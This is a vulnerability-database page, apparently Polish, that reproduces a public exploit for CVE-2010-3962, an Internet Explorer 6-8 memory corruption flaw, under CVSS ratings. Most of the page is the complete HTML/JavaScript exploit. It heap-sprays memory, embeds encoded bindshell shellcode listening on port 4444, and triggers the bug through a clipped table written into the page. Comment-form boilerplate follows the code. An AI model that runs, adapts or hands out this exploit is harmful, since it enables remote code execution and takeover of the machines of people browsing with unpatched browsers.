Internet Explorer 6, 7, 8 Memory Corruption 0day Exploit

Risk: High
Local: No
Remote: Yes
CWE: CWE-399

Ogólna skala CVSS: 9.3/10
Znaczenie: 10/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Pełny
Wpływ na integralność: Pełny
Wpływ na dostępność: Pełny

# Internet Explorer Memory Corruption 0day Vulnerability CVE-2010-3962 # Tested on Windows XP SP3 IE6 IE7 IE8 # Coded by Matteo Memelli ryujin __at__ # # Thx to dookie __at__ # notes : This is a quick and dirty exploit! No DEP/ASLR bypass here feel free to improve it <!-- Tested on IE6/IE7/IE8 XPSP3 quick and dirty sploit for CVE-2010-3962 zeroday Note: The EIP value at crash time depends on the exact version of the mshtml library used by IE. This means that the exploit is not universal for the IE versions indicated in the exploit. IE6 on XP SP2: mshtml.dll Version 6.0.2900.5512 EIP: 0x0D7DC9C9 IE7 on XP SP3: mshtml.dll Version 7.00.6000.17080 EIP: 0x303CEEBB IE8 on XP SP3: mshtml.dll Version 8.00.6001.18939 EIP: 0x1D3CF5BD Matteo Memelli, ryujin __at__ thx to dookie __at__ //--> <html> <head><title>poc CVE-2010-3962 zeroday</title> <script> function alloc(bytes, mystr) { // Bindshell on port 4444 var shellcode = unescape('%u9090%u9090%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b'+ '%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b'+ '%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34'+ '%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301'+ '%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a'+ '%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900%u54c4'+ '%u6850%u8029%u006b%ud5ff%u5050%u5050%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7%u53db%u0268'+ '%u1100%u895c%u6ae6%u5610%u6857%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff%u53d5%u5753%u7468'+ '%u3bec%uffe1%u57d5%uc789%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389%u5757%u3157%u6af6%u5912'+ '%ue256%u66fd%u44c7%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650%u5656%u5646%u564e%u5356%u6856'+ '%ucc79%u863f%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd'+ '%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u41d5'); while (mystr.length< bytes) mystr += mystr; return mystr.substr(0, (bytes-6)/2) + shellcode; } </script> </head> <body> <script> alert('ph33r: click me'); var evil = new Array(); var FAKEOBJ = unescape("%u0d0d%u0d0d"); //FAKEOBJ = alloc(233120, FAKEOBJ); // IE6 //FAKEOBJ = alloc(733120, FAKEOBJ); // IE7 FAKEOBJ = alloc(433120, FAKEOBJ); // IE8 for (var k = 0; k < 1000; k++) { evil[k] = FAKEOBJ.substr(0, FAKEOBJ.length); } document.write("<table style=position:absolute;clip:rect(0)>"); </script> </body> </html>


Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022,


Back to Top